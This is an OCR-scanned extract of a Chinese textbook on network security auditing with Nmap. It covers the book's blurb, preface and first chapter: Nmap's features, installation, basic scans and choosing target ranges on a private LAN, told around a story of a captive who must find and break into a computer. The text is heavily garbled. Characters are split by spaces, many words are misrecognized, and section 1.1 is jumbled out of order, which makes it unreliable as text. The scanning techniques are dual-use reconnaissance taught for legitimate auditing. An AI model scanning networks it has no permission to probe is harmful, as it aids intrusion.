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内 容 简 介 


Nmap 是 目前 非常 受 关注 的 网 络 安全 审计 技术 工具 ， 是 绝 大 多 数 从 事 网 络 安全 人 员 的 必 备 工 
具 。 本 书 由 一 线 网 络 安全 教师 亲笔 撰写 ， 凝 聚 了 作者 多 年 教学 与 实践 开发 经 验 ， 内 容 涉及 网 络 安全 
审计 的 作用 、 价 值 、 方 法 论 ，Nmap 在 网 络 安全 管理 方面 的 方法 与 应 用 ， 以 及 Nmap 强大 的 脚本 编 
写 功 能 等 。 本 书 内 容 并 不 局 限于 某 个 具体 功能 的 使 用 ， 而 是 系统 深入 地 结合 Nmap 与 网 络 审计 原理 
进行 讲解 ， 帮 助 网 络 安全 人 员 全 面 深入 了 解 使 用 Nmap 进行 网 络 安全 审计 的 相关 技术 。 本 书 讲解 的 
内 容 通俗 易 懂 、 深 入 浅 出 ， 特 别 是 书 中 所 用 示例 的 设计 ， 它 们 不 仅 可 以 让 读者 理解 某 个 知识 点 的 用 
法 ， 更 能 让 读者 明白 具体 知识 点 所 使 用 的 场景 ， 从 而 更 深入 地 理解 具体 内 容 。 

本 书 内 容 安排 合理 ， 架 构 清晰 ， 注 意 理论 与 实践 相 结 合 ， 适 合 那些 希望 学 习 Nmap 进行 网 络 安 
全 审计 的 网 络 安全 渗透 测试 人 员 、 运 维 工程 师 、 网 络 管理 人 员 、 网 络 安全 设备 设计 人 员 、 网 络 安全 
软件 开发 人 员 、 安 全 课程 培训 人 员 、 高 校 网 络 安全 专业 方向 的 学 生 等 阅读 。 
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为 什么 要 写 这 本 书 


很 多 人 在 年 少时 ， 都 曾经 有 一 个 黑客 梦 。 

还 记得 我 第 一 次 接触 “黑客 ”这 个 词 是 在 很 早 的 一 部 名 为 《战争 游戏 》 的 电影 ， 虽 然 
那 时 我 甚至 还 没 见 过 真正 的 计算 机 ， 但 是 里 面 的 情节 却 深 深 地 印 在 了 我 的 脑海 之 中 。 从 那 以 
后 ,我 开始 对 每 部 电影 中 出 现 的 黑客 情节 都 十 分 感 兴趣 ， 也 经 常 推荐 电影 中 这 些 情 节 在 现实 
中 的 可 行 性 。1999 年 ， 一 部 名 为 《黑客 帝国 》 的 影片 风靡 了 整个 世界 。 对 我 来 说 ， 这 部 影 
片 的 意义 更 为 深刻 ， 在 这 部 影片 中 ,我 居然 见识 到 了 一 个 真实 中 存在 的 极 客 工具 一 一 Nmap。 
这 个 发 现 让 我 兴奋 不 已 。 

要 知道 ， 极 客 技术 在 外 人 看 起 来 神奇 无 比 ， 对 于 这 方面 的 学 习 者 来 说 却 是 头疼 无 比 。 数 
量 众多 的 知识 需要 学 习 ， 各 种 各 样 的 工具 需要 掌握 ， 在 我 刚 开始 接触 极 客 技术 的 时 候 ， 几 乎 
每 天 都 将 精力 用 在 对 各 种 工具 的 掌握 上 。 不 过 ， 很 快 我 也 意识 到 了 自己 的 失误 一 一 在 “ 鱼 ” 
与 “ 渔 ” 之 间 ， 错 误 地 选 了 “ 鱼 ”。 我 缺乏 的 不 是 一 款 万 能 的 黑客 工具 ， 而 是 一 个 能 将 自己 
想法 快速 实现 的 工具 ， 而 这 个 问题 随 着 Nmap 的 出 现 迎刃而解 。 

Nmap 是 网 络 安全 方面 极为 常用 的 工具 ， 它 的 使 用 相当 广泛 。 凡 是 从 事 网 络 安全 技术 
的 人 员 几 乎 都 接触 过 这 款 工 具 。Nmap 作为 世界 渗透 测试 行业 公认 最 优秀 的 网 络 安全 审计 工 
具 ， 它 可 以 通过 对 设备 的 探测 来 审计 其 安全 性 ， 而 且 功能 极为 完备 ， 单 是 对 端口 状态 的 扫描 
技术 就 有 数 十 种 。 不 过 很 可 惜 的 是 ， 由 于 国内 Nmap 方面 的 学 习 资 料 相对 匮乏 ， 很 多 人 都 将 
Nmap 作为 一 种 普通 的 端口 扫描 工具 来 使 用 ， 却 忽略 Nmap 中 强大 的 编程 能 力 。NSE 是 Nmap 
中 革命 性 的 创新 。 通 过 Nmap 强大 的 脚本 引擎 (NSE)， 每 一 个 用 户 都 可 以 向 Nmap 中 添加 自 
己 编写 的 代码 ， 从 而 将 Nmap 打造 成 用 户 自由 定制 功能 的 强大 工具 。 可 以 这 样 说 ，NSE 的 使 
用 才 是 真正 的 “ 授 人 以 渔 ”。 

在 本 书 的 编写 过 程 中 ,我 一 直 在 学 校 从 事 网 络 安全 的 教学 工作 。 这 使 得 每 当 我 在 进行 一 
个 章节 编写 时 ， 可 以 预先 在 课堂 上 进行 讲授 ， 从 而 直接 感受 到 学 生 对 此 的 反映 ， 他 们 其 实 是 
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本 书 的 第 一 批 读 者 。 现 在 成 书 之 时 ， 也 正 值 他 们 毕业 之 际 。 在 这 里 希望 书 中 的 知识 能 够 为 他 
们 以 后 的 工作 提供 一 些 帮 助 。 同 样 也 希望 这 本 书 能 为 读者 们 带 来 帮助 。 


本 书 特色 


Nmap 的 强大 功能 是 毋庸 置疑 的 ， 它 几乎 是 当前 的 极 客 必 备 工具 ， 你 几乎 可 以 在 任何 经 
典 的 网 络 安全 图 书 中 找到 它 的 名 字 ， 甚 至 可 以 在 大 量 的 影视 作品 (例如 《 Matrix | 黑客 帝国 》 
《极乐 空间 》《 谍 影 重 重 》《 虎 胆 龙 威 4》 等) 中 看 到 它 的 身影 。 目 前 ， 国 内 对 于 Nmap 的 研究 
越 来 越 热 。 近 年 来 正 是 国内 网 络 安全 飞速 发 展 的 阶段 ，Nmap 这 个 曾经 只 有 顶尖 高 手 才 能 使 
用 的 “旧时 王 谢 堂前 燕 ”， 到 如 今 终于 飞人 了 普通 网 络 安全 工作 人 员 的 “寻常 百姓 家 "， 受 到 
广大 网 络 安全 行业 从 业 人 员 的 喜爱 ， 假 以 时 日 ， 它 必 将 成 为 国内 最 为 流行 的 网 络 安全 审计 工 
具 之 一 。 本 人 从 2009 年 开始 正式 涉足 网 络 渗透 领域 ， 对 于 Nmap 的 使 用 ， 花 费 了 大 量 的 时 
间 和 精力 进行 研究 ， 尤 其 是 阅读 了 大 量 国外 的 相关 文献 。 在 本 书 中 将 会 分 享 自己 学 习 Nmap 
的 使 用 经 验 、 方 法 和 总 结 ， 希 望 可 以 减少 其 他 Nmap 学 习 者 的 学 习 成 本 。 

本 书 是 第 一 本 系统 深入 将 Nmap 应 用 实例 与 网 络 原理 相 结 合 进行 讲解 的 工具 书 ， 不 仅仅 
XE Nmap 的 实际 应 用 方法 ， 更 从 网 络 原理 的 角度 来 分 析 Nmap 实现 网 络 安全 审计 的 技术 ,将 各 
种 网 络 协议 、 各 种 数据 包 格 式 等 知识 与 Nmap 的 实践 应 用 相 结合 ， 真 正 做 到 理论 与 实践 相 结 合 。 
本 书 还 将 对 Nmap 强大 的 脚本 引擎 (NSE) 进行 系统 而 又 深入 的 讲解 ， 以 达到 通过 Lua 编程 来 
扩展 Nmap 的 功能 ， 将 Nmap 打造 成 为 用 户 可 以 自由 定制 功能 的 强大 工具 ， 真正 地 做 到 “ 授 人 
以 渔 " 。 这 里 之 所 以 将 本 书 命名 为 “ 诸 神 之 眼 "， 就 是 暗示 Nmap 在 网 络 中 强大 的 信息 收集 能 力 。 


读者 对 象 

本 书 的 读者 群 主要 是 网 络 安全 渗透 测试 人 员 、 运 维 工程 师 、 网 络 管理 人 员 、 网 络 安全 
设备 设计 人 员 、 网 络 安全 软件 开发 人 员 、 安 全 课程 培训 人 员 、 高 校 网 络 安全 专业 方向 的 学 生 
等 ， 其 他 读者 还 包括 各 种 非 专业 但 却 热衷 于 网 络 安全 研究 的 人 员 。 

目前 随 着 极 客 文化 的 盛行 ， 以 及 网 络 安全 爱好 者 日 益 增多 ， 本 书 将 对 网 络 安全 的 宣传 与 
教育 起 到 重要 作用 。 


如 何 阅读 本 书 

本 书 可 分 为 三 大 部 分 。 

基础 知识 : 从 Nmap 的 基础 讲 起 ， 系 统 讲述 了 网 络 安全 审计 的 作用 、 价 值 、 方 法 论 ， 
Nmap 在 网 络 安全 管理 上 的 应 用 ， 以 及 Nmap 在 实现 这 些 应 用 时 相关 的 网 络 原理 和 技术 等 。 

网 络 安全 审计 : 结合 实例 讲解 使 用 Nmap 进行 网 络 安全 审计 的 方式 和 方法 ， 以 及 在 实际 
渗透 中 的 各 种 应 用 。 

脚本 : 介绍 Nmap 的 强大 脚本 编写 功能 ， 使 读者 可 以 最 终 将 Nmap 打造 成 为 个 性 化 的 工具 。 















































前 言 « II 


阅读 本 书 的 建议 


O BA Nmap 基础 的 读者 ， 建 议 从 第 1 章 顺 次 阅读 并 演练 每 一 个 实例 。 

口 有 一 定 Nmap 基础 的 读者 ， 可 以 根据 实际 情况 有 重点 地 选择 阅读 各 个 技术 要 点 。 

口 对 于 每 一 个 知识 点 和 项 目 案 例 ， 先 通读 一 遍 有 个 大 概 印象 ， 然 后 将 每 个 知识 点 的 示例 
代码 都 在 开发 环境 中 操作 一 遍 ， 加 深 对 知识 点 的 印象 。 


勘误 和 支持 

由 于 作者 的 水 平 有 限 ， 编 写 时 间 仓促 ， 书 中 难免 会 出 现 一 些 错误 或 者 不 准确 的 地 方 ， 
恳请 读者 批评 指正 。 欢 迎 您 通过 清华 大 学 出 版 社 网 站 (www.tup.com.cn) 与 我 们 联系 ， 同 时 
也 欢迎 大 家 与 作者 交流 ， 作 者 的 邮箱 是 lihuafeng1999@163.com， 期 待 能 够 得 到 你 们 的 真挚 
反馈 。 


致谢 

首先 要 感谢 我 的 单位 提供 的 自由 而 又 宽松 的 科研 工作 环境 ， 正 是 这 种 完全 自由 的 氛围 才 
使 得 年 少时 的 梦想 成 为 我 现实 生活 中 的 工作 。 

感谢 清华 大 学 出 版 社 的 秦 健 编辑 ， 在 本 书 的 编写 过 程 中 始终 支持 我 的 写作 ， 你 的 鼓励 和 
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刘 开 缓 缓 地 睁 开眼 睛 。 

此 刻 他 正 处 在 一 个 阴冷 的 房间 内 ， 这 个 房间 除了 一 扇 门 之 外 再 无 任何 出 口 。 

“这 是 在 哪里 ?” 

刘 开 支撑 着 身体 慢 慢 坐 了 起 来 ， 他 注意 到 身边 只 有 一 台 笔记 本 电脑 。 

他 站 起 身 ， 走 向 门口 ， 试 图 打开 门 ， 然 而 这 一 切 都 是 徒劳 的 ， 门 是 锁 着 的 ， 无 论 怎么 撞 
都 无 法 打开 。 房 子 十 分 密实 ， 屋 里 的 声音 根本 传 不 出 去 ， 呼 救 也 只 能 是 徒劳 无 功 。 

在 仔细 检查 这 个 房间 后 再 也 没有 找到 任何 其 他 东西 ， 唯 一 可 以 利用 的 只 有 那 台 笔记 本 电 
脑 ， 他 只 好 返 身 回来 ， 蹲 下 身子 ， 将 笔记 本 电脑 打开 。 

刚刚 开机 ， 笔 记 本 电脑 就 发 出 了 电量 过 低 ， 将 在 20 分 钟 后 自动 关机 的 警报 。 

随即 笔记 本 电脑 屏幕 上 赫然 出 现 了 一 行 如 同 鲜血 写成 的 文字 ! 

“房间 的 门 锁 由 一 台 计 算 机 X 控制 ， 在 网 络 上 找到 并 侵入 它 ， 在 取得 它 的 控制 权 之 后 ， 
就 可 以 打开 门 锁 。 否 则 你 将 永远 被 关 在 这 个 房间 里 !1” 

这 是 一 个 看 起 来 很 像 密室 逃生 故事 的 开头 ， 不 过 不 同 的 是 ， 故 事 中 的 刘 开 不 再 像 其 他 电 
影 中 的 人 物 一 样 要 找 出 一 些 隐藏 的 物品 ， 在 这 个 空 荡 的 房间 里 ， 他 可 以 依靠 的 只 有 这 一 台 笔 
记 本 电脑 ， 而 仅 有 的 这 一 丝 希望 也 将 会 在 20 分 钟 后 因 停 电 而 消失 。 

在 这 仅 有 的 20 分 钟 内 ， 刘 开 该 如 何 才能 成 功 逃 脱 呢 ? 

好 了 ,我 们 正在 开始 一 个 精彩 的 故事 ， 随 着 剧情 的 进展 ， 你 将 领略 到 网 络 世 界 的 神奇 ， 
并 掌握 保卫 这 个 世界 的 技能 。 














在 这 一 章 中 ， 除 了 
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头 这 个 紧张 的 故事 之 外 ， 还 将 学 习 以 下 内 容 。 


口 传奇 般 的 安全 审计 工具 Nmap。 
口 Nmap 的 下 载 与 安装 。 


口 Nmap 的 基本 操作 。 


口 Nmap 扫描 范 














的 确定 。 





1.1 Nmap 简介 
对 于 已 经 陷入 困境 的 刘 开 ,什么 能 够 给 他 带 来 一 丝 希 望 呢 ? 如 果 没 有 从 天 而 降 的 救兵 的 








话 ， 刘 开 所 能 依靠 的 
工具 又 是 什么 呢 ? 


只 有 自己 娴熟 的 技术 ,以 及 某 个 强大 的 工具 。 此 时 ， 刘 开 最 希望 得 到 的 


如 果 可 以 选择 ，Nmap (Network Mapper) 绝对 是 此 时 刘 开 的 最 佳 选择 。 作 为 当今 顶尖 


的 网 络 审计 工具 ，Nmap 在 国 


多 优秀 影视 作品 中 ， 





如 图 1-1 所 示 。 





外 已 经 被 大 量 的 网 络 安全 人 员 所 使 用 ， 它 的 身影 甚至 出 现在 很 


其 中 影响 力 最 大 的 要 数 经 典 巨著 《黑客 帝国 》 系 列 。 在 《黑客 帝国 2》 
中 ， 影 片 中 的 女 主 人 公 Tritnity 就 曾 使 用 Nmap 攻击 SSH 服务 ， 从 而 破坏 了 发 电厂 的 工作 ， 


/< ,二 
y m- 


《黑客 帝国 2》 中 女 主人 公 Tritnity 正在 使 用 Nmap 攻击 SSH 服务 


图 1-1 


Nmap 是 由 Gordon Lyon it il Jf 


Nmap 的 目的 只 是 希 
越 来 越 全 面 。2009 4 





























F 实现 的 ， 于 1997 开 始 发 布 。Gordon Lyon 最 初 设计 


望 打造 一 款 强 大 的 端口 扫描 工具 。 但 是 随 着 时 间 的 发 展 ，Nmap 的 功能 








F 7 月 17 日 ， 开 源 网 络 安全 扫描 








1997 年 以 来 最 重要 的 发 布 ， 代 表 着 Nmap 从 简单 的 网 


和 网 络 工具 组 件 。 目 





工具 Nmap 正式 发 布 了 5.00 版 ， 这 是 自 





前 Nmap 已 经 更 新 到 7.30 版 。 


络 连接 端 扫描 软件 变 身 为 全 方面 的 安全 
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现在 的 Nmap 已 经 具备 了 如 下 各 种 功能 。 
Q 主机 发 现 功能 : 向 目标 计算 机 发 送 特制 的 数据 包 组 合 ， 然 后 根据 目标 的 反应 来 确定 它 
是 否 处 于 开机 并 连接 到 网 络 的 状态 。 
Q 端口 扫描 : 向 目标 计算 机 的 指定 端口 发 送 特制 的 数据 包 组 合 ， 然 后 根据 目标 端口 的 反 
应 来 判断 它 是 否 开放 。 
口 服务 及 版 本 检测 : 向 目标 计算 机 的 目标 端口 发 送 特制 的 数据 包 组 合 ， 然 后 根据 目标 的 
反应 来 检测 它 运行 服务 的 服务 类 型 和 版 本 。 
口 操作 系统 检测 : 向 目标 计算 机 发 送 特制 的 数据 包 组 合 ， 然 后 根据 目标 的 反应 来 检测 它 
的 操作 系统 类 型 和 版 本 。 
除了 这 些 基本 功能 之 外 ，Nmap 还 实现 一 些 高 级 审计 技术 ， 例 如 伪造 发 起 扫描 端的 身份 ， 
进行 隐蔽 扫描 ， 规 避 目 标的 安全 防御 设备 (例如 防火 墙 )， 对 系统 进行 安全 漏洞 检测 ， 并 提供 
完善 的 报告 选项 等 。 在 后 来 的 不 断 发 展 中 ， 随 着 Nmap 强大 的 脚本 引擎 (NSE) 的 推出 ,， 任 
何人 都 可 以 向 Nmap 中 添加 新 的 功能 模块 。 
如 果 使 用 Nmap 对 一 台 计 算 机 进行 审计 ， 最 终 可 以 获得 目标 如 下 的 信息 。 
口 目标 主机 是 否 在 线 。 
O 目标 主 机 所 在 网 络 的 结构 。 
口 目标 主机 上 开放 的 端口 ， 例 如 80 端口 、135 端口 、443 端口 等 。 
口 目标 主机 所 使 用 的 操作 系统 ， 例 如 Windows 7、Windows 10、Linux 2.6.18、Android 
4.1.2 等 。 
O 目标 主机 上 所 和 运行 的 服务 以 及 版 本 ， 例 如 Apache httpd 2.2.14、OpenSSH 5.3p1、 
Debian 3、Ubuntu 4 等 。 
O 目标 主机 上 所 存在 的 漏洞 ， 例 如 弱 口 令 、ms08_067、ms10_054 等 。 
收集 目标 信息 是 整个 安全 审计 环节 中 至 关 重 要 的 一 部 分 工作 。 如 此 一 来 ， 对 目标 的 信息 
将 了 若 指 掌 。 














12 Nmap 的 下 载 与 安装 


在 开始 正式 工作 之 前 ， 首 先 需 要 从 Nmap 的 官方 网 站 ( https://Nmap.org/download.html ) 
下 载 这 款 软件 ， 要 注意 这 个 页 面 中 提供 了 对 应 不 同 操作 系统 的 软件 版 本 ， 在 使 用 的 时 候选 择 
对 应 所 使 用 的 操作 系统 的 版 本 。 























1.2.1 在 Windows 系统 下 安装 与 下 载 Nmap 
步骤 1: 下 载 Nmap。 在 Windows 下 安装 Nmap 时 ， 注 意 网 站 提供 两 个 版 本 的 Nmap ， 
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一 个 是 最 新 版 ， 另 一 个 是 稳定 版 。 这 里 以 稳定 版 Nmap-7.12-setup.exe 为 例 ， 图 1-2 给 出 了 适 
用 于 Windows 操作 系统 的 Nmap 下 载 地 址 。 























图 1-2 适用 于 Windows 操作 系统 的 Nmap 下 载 地 址 
步骤 2 : 启动 Nmap 安装 程序 ， 选 择 默 认 安 装 (推荐 )， 就 可 以 自动 将 如 图 1-3 所 示 全 部 
的 组 件 都 装 好 。 





局 Nmap Setup 





Choose Components 
Choose which features of Nmap you want to install. 


Check the components you want to install and uncheck the components you don't want to 
install. Cick Next to continue. 


Select components to install: 


[v] Ncat (Modem Netcat1 | 
[v] Náff (Scan comparisoI —. 














图 1-3 Nmap 安装 过 程 中 的 组 件 选择 


步骤 3 : 在 安装 过 程 中 ， 将 会 安装 一 个 WinPcap 插件 ， 如 果 之 前 没有 安装 过 WinPcap, 
就 需要 对 其 进行 安装 。 如 果 之 前 你 的 计算 机 上 安装 过 处 理 数据 包 的 软件 ， 将 会 弹出 一 个 如 图 
1-4 所 示 的 对 话 框 ， 只 需要 单 击 “ 确 定 ”按钮 就 可 以 了 。 

步骤 4: 之 后 的 操作 只 需要 一 路 单 击 Next 按钮 即 可 ， 直 到 完成 安装 ， 如 图 1-5 所 示 。 

步骤 5 : 安装 完成 以 后 ， 可 以 在 Windows 命令 行 窗口 中 输入 Nmap 命令 启动 Nmap， 如 
图 1-6 所 示 。 
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Winpcap (Nmap) 413 Setup mm) 





Skipping WinPcap installation since version 4.1.0.2980 already exists on 
this system. Uninstall that version first if you wish to force install. 


图 1-4. Nmap 安装 所 需要 的 WinPcap 




















© Nmap Setup LT, lose 


Finished c 
Thank you for instaling Nmap © 








Nmap has been installed on your computer. 


Clck Finish to dose this wizard, 


Caw 
图 1-5 Nmap 安装 完毕 




















Bi EA: C\Windows\system32\emd.exe 


icrosoft Windows [版 本 6.1.7601] 
版 权 所 有 «c» 2009 Microsoft Corporation 


Nisers Nadnin?nnap 
map 7.12 < https://nmap.org >) 
Usage: nmap [Scan TypeCs)] [Options] <target specification) 
ARGET SPECIFICATIOI 
pass hostnames, IP addresses, networks, etc. 
scanme -nmap-org。 nicrosoft.con/24, 192.168.8.1; 18.0.89-255.1-254 
《inputfilename>: Input from list of hosts/networks 
《num hosts?: Choose random targets 
一 exclude €hostif,host2][,host31,...5: Exclude hosts/networks 
xcludefile «exclude file»: Exclude list from file 
OST DISCOVERY: 
sL: List Scan - simply list targets to scan 
sn: Ping Scan - disable port scan 
-Pn: Treat all hosts as online — skip host discovery 
-PS/PA/PU/PY [portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports 
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes 
-PO[protocol list]: IP Protocol Ping 
-n/-R: Never do DNS resolution/Rluays resolve [default: sometimes] 
—dns-servers 4servil,seru21,...5: Specify custom DNS servers 
system-dns: Use OS's DNS resolver 
—traceroute: Trace hop path to each host 
SCAN TECHNIQUE: 





iB3kNmap « 

















图 1-6 Windows 工作 环境 下 Nmap 的 运行 界面 
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1.2.2 在 Linux 系统 下 安装 Nmap 


一 些 专门 用 来 进行 网 络 安全 工作 的 Linux 操作 系统 中 已 经 预 装 了 Nmap， 比 如 
BackTrack 系统 和 Kali 系统 。 大 部 分 Linux 操作 系统 中 还 需要 自行 安装 。 如 果 系 统 中 已 
经 安装 了 RPM Package Manager ( RPM 软件 包 管理 器 )， 那 么 Nmap 的 安装 将 会 变 得 十 分 
简单 。 如 果 系 统 没 有 安装 RPM， 也 可 以 先行 安装 。 下 面 以 Ubuntu 为 例 ， 使 用 如 下 命令 安 





装 RPM。 
sudo apt-get install rpm 
之 后 只 需要 输入 如 下 命令 就 可 以 完成 Nmap 及 其 组 件 的 安装 。 


rpm -vhU https://Nmap.org/dist/Nmap-7.25BETA2-1.x86 64.rpm 
rpm -vhU https://Nmap.org/dist/zeNmap-7.25BETA2-1.noarch.rpm 
rpm -vhU https://Nmap.org/dist/ncat-7.25BETA2-1.x86 64.rpm 
rpm -vhU https://Nmap.org/dist/nping-0.7.25BETA2-1.x86 64.rpm 


注意 ， 图 形 化 的 Nmap 版 本 Zenmap 采用 了 noarch 格式 。 


13 Nmap 的 基本 操作 


使 用 Nmap 最 简单 的 方式 就 是 在 命令 行 中 输入 Nmap 和 < AER IP 地 址 >， 例 如， 


Nmap 192.168.0.1 

下 面 就 是 执行 这 条 命令 的 扫描 结果 。 

Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-07 09:39 
Nmap scan report for 192.168.0.1 


Host is up (0.030s latency). 
Not shown: 997 closed ports 


PORT STATE SERVICE 
23/tcp open telnet 
80/tcp open http 
5431/tcp open park-agent 


MAC Address: D8:FE:E3:B3:87:A9 (D-Link International) 
Nmap done: 1 IP address (1 host up) scanned in 4.71 seconds 


666600 


© 


扫描 结果 中 ，Q@ 给 出 了 当前 使 用 的 Nmap 版 本 为 7.12， 扫 描 开 始 时 间 为 2016-09-07 09:39. 





@ 是 一 个 标题 ， 生 成 的 是 关于 192.168.0.1 主机 的 报告 。 


@ 给 出 目标 主机 的 状态 为 up (意味 着 这 台 主 机 处 于 开机 并 连 上 了 互联 网 的 状态 )。 





@ 表 示 在 进行 检查 的 1000 个 端口 中 ， 有 997 个 是 关闭 的 。 


@ 是 一 张 表 ,这 张 表 中 一 共有 三 个 字段 ,分 别 是 PORT、STATE、SERVICE， 其 中 


PORT 指 的 是 端口 ，STATE 指 的 是 状态 ，SERVICE 指 的 是 运行 的 服务 。 


例如 ，@ 中 PORT 列 的 值 为 23/tcp，STATE 列 的 值 为 open，SERVICE 列 的 值 为 telnet， 
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完整 的 含义 就 是 Nmap 发 现 目标 计算 机 上 的 23 号 端口 目前 处 于 开放 状态 ， 这 个 端口 提供 
telnet 服务 。 

@ 给 出 了 目标 主机 的 硬件 地 址 为 D8:FE:E3:B3:87:A9， 从 后 面 括号 中 的 信息 可 以 看 出 这 
是 一 台 D-Link 的 家 用 路 由 器 。 

@ 给 出 了 经 过 对 1 台 主 机 进行 扫描 ， 发 现 1 AREH up 的 主机 ， 耗 时 4.71 秒 。 

















1.4 扫描 范围 的 确定 


刘 开 快速 检查 了 笔记 本 电脑 中 的 软件 ， 幸 运 的 是 ， 居 然 找 到 了 Nmap， 接 下 来 正 戏 就 要 
上 演 了 。 刘 开 现 在 并 不 知道 计算 机 义 的 IP 地址 ， 因 此 当前 最 首要 的 任务 就 是 找到 这 台 计 算 
机 。 首 先 刘 开 检查 这 台 计 算 机 的 网 络 情况 ,发现 这 台 计 算 机 无 法 连接 到 互联 网 。 这 意味 着 X 
很 有 可 能 就 与 刘 开 现在 所 使 用 的 笔记 本 电脑 在 同一 个 网 络 中 ， 否 则 这 个 难题 就 真 的 无 解 了 。 

刘 开 快速 查看 了 本 机 的 IP 4E, RI IPE 192.168.0.2, W4 255.255.255.0, AR 
么 义 的 地 址 应 该 就 在 192.168.0.1 到 192.168.0.255 之 间 。 现 在 最 简单 的 做 法 就 是 先 将 这 个 范 
围 内 所 有 处 于 开机 并 联网 状态 的 主机 都 找 出 来 。 

接 下 来 我 们 来 看 如 何 确定 扫描 的 范围 。 


14.1. ”对 连续 范围 内 的 主机 进行 扫描 


1.3 节 已 经 介绍 了 如 何 对 一 个 目标 的 可 能 IP 地 址 进行 确定 ， 下 面 对 指定 范围 内 的 多 个 目 
标 进行 扫描 。 

命令 语法 : Nmap [IP 地 址 的 范围 ] 

例如 ,在 13 节 的 情形 中 ， 刘 开 就 可 以 输入 如 下 命令 来 选择 扫描 范围 为 192.168.0.1 ~ 
192.168.0.255 的 主机 。 

Nmap -sn 192.168.0.1-255 


下 面 给 出 的 是 扫描 的 结果 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-14 13:03 

Nmap scan report for 192.168.0.1 

Host is up (0.041s latency). 

MAC Address: D8:FE:E3:B3:87:A9 (D-Link International 

Nmap scan report for 192.168.0.3 

Host is up (0.090s latency). 

MAC Address: CC:D2:9B:2B:11:78 (Shenzhen Bopengfa Elec&Technology 
Nmap scan report for 192.168.0.2 

Host is up. 

Nmap done: 255 IP addresses (3 hosts up) scanned in 6.40 seconds 
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在 这 里 可 以 看 到 通过 这 次 扫描 ， 在 这 个 子 网 中 共有 3 台 设备 。 另 外 ， 为 了 节约 扫描 时 





间 ， 使 用 了 -sn 参数 ，-sn 具体 的 含义 将 在 第 2 章 介绍 。 
1.4.2 ”对 整个 子 网 进行 扫描 


整个 子 网 。 


Nmap 支持 使 用 CIDR ( Classless Inter-Domain Routing， 无 类 别 域 间 路 由 ) 的 方式 来 扫描 





命令 语法 : Nmap [IP 地 址 / 掩 码 位 数 ] 
还 是 以 1.3 节 的 情形 为 例 ， 如 果 要 扫描 192.168.0.1 ~ 192.168.0.255 这 个 子 网 范围 的 主 





机 ， 还 可 以 使 用 如 下 命令 。 


Nmap -sn 192.168.0.1/24 


下 面 给 出 的 是 扫描 的 结果 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-14 13:19 

Nmap scan report for 192.168.0.1 

Host is up (0.0040s latency). 

MAC Address: D8:FE:E3:B3:87:A9 (D-Link International) 

Nmap scan report for 192.168.0.3 

Host is up (0.065s latency). 

MAC Address: CC:D2:9B:2B:11:78 (Shenzhen Bopengfa Elec&Technology) 
Nmap scan report for 192.168.0.2 

Host is up. 

Nmap done: 256 IP addresses (3 hosts up) scanned in 5.57 seconds 


1.4.3 ”对 多 个 不 连续 的 主机 进行 扫描 


Nmap 可 以 一 次 扫描 多 个 主机 ， 如 果 这 些 扫描 的 目标 地 址 没有 任何 的 关系 ， 那 么 可 以 通 


过 将 目标 地 址 用 空格 分 隔 开 的 方式 来 同时 对 这 些 主机 进行 扫描 。 


命令 语法 : Nmap 【[ 扫描 目标 1 扫描 目标 2 … 扫描 目标 n] 
如 果 对 192.168.0.1、192.168.0.2、192.168.0.3、192.168.0.4 进行 扫描 ， 可 以 使 用 如 下 命令 。 


Nmap -sn 192.168.0.1 192.168.0.2 192.168.0.3 192.168.0.4 
扫描 的 结果 如 下 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-14 13:33 

Nmap scan report for 192.168.0.1 

Host is up (0.0040s latency). 

MAC Address: D8:FE:E3:B3:87:A9 (D-Link International 

Nmap scan report for 192.168.0.3 

Host is up (0.055s latency). 

MAC Address: CC:D2:9B:2B:11:78 (Shenzhen Bopengfa Elec&Technology 
Nmap scan report for 192.168.0.2 

Host is up. 

Nmap done: 3 IP addresses (3 hosts up) scanned in 1.99 seconds 
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1.4.4 ”在 扫描 的 时 候 排除 指定 的 目标 

在 对 一 些 主机 进行 扫描 时 ， 如 果 需 要 排除 某 些 指定 主机 ， 可 以 使 用 exclude 选项 。 

命令 语法 : Nmap [ 目标 ] --exclude [目标 ] 

例如 ， 如 果 我 们 希望 在 扫描 192.168.0.0/24 子 网 的 时 候 ， 并 不 对 192.168.0.2 进行 扫描 ， 
就 可 以 使 用 如 下 命令 。 

Nmap -sn 192.168.0.0/24 --exclude 192.168.0.2 


扫描 的 结果 如 下 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-14 13:51 

Nmap scan report for 192.168.0.1 

Host is up (0.0040s latency). 

MAC Address: D8:FE:E3:B3:87:A9 (D-Link International) 

Nmap scan report for 192.168.0.3 

Host is up (0.057s latency). 

MAC Address: CC:D2:9B:2B:11:78 (Shenzhen Bopengfa Elec&Technology) 
Nmap scan report for 192.168.0.5 

Host is up (0.077s latency). 

MAC Address: D8:55:A3:D9:DC:1D (zte) 

Nmap done: 255 IP addresses (3 hosts up) scanned in 45.35 seconds 


1.4.5 对 一 个 文本 文件 中 的 地 址 列表 进行 扫描 


如 果 需 要 经 常 性 地 对 某 些 地 址 进行 扫描 ,那么 每 次 都 在 命令 中 输入 这 些 地 址 是 相当 麻 
烦 的 ， 可 以 将 常用 的 地 址 保存 在 一 个 记事 本 文件 中 ， =- 
例如 Listtxt， 如 图 1-7 所 示 。 — 

以 后 ， 每 次 想 对 这 些 地 址 进行 扫描 ， 无 须 重新 sio: 
输入 ， 只 需要 将 这 个 文本 文件 设 定 为 目标 即 可 。 :168.0. 

命令 语法 : Nmap -iL [文本 文件 ] 

可 以 使 用 命令 对 List.txt 中 的 这 些 地址 进行 扫描 。 

Nmap -sn -iL List.txt 


扫描 的 结果 如 下 。 


Starting Nmap 7.12 ( https://Nmap.org ) at 2016-09-14 14:20 
Nmap scan report for 192.168.0.1 

Host is up (0.0040s latency). 

MAC Address: D8:FE:E3:B3:87:A9 (D-Link International 

Nmap scan report for 192.168.0.3Host is up (0.057s latency). 




















图 1-7 使 用 记事 本 list.txt 保存 目标 地 址 


MAC Address: CC:D2:9B:2B:11:78 (Shenzhen Bopengfa Elec&Technology) 
Nmap done: 7 IP addresses (2 hosts up) scanned in 3.35 seconds 
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1.4.6 ”随机 确定 扫描 目标 
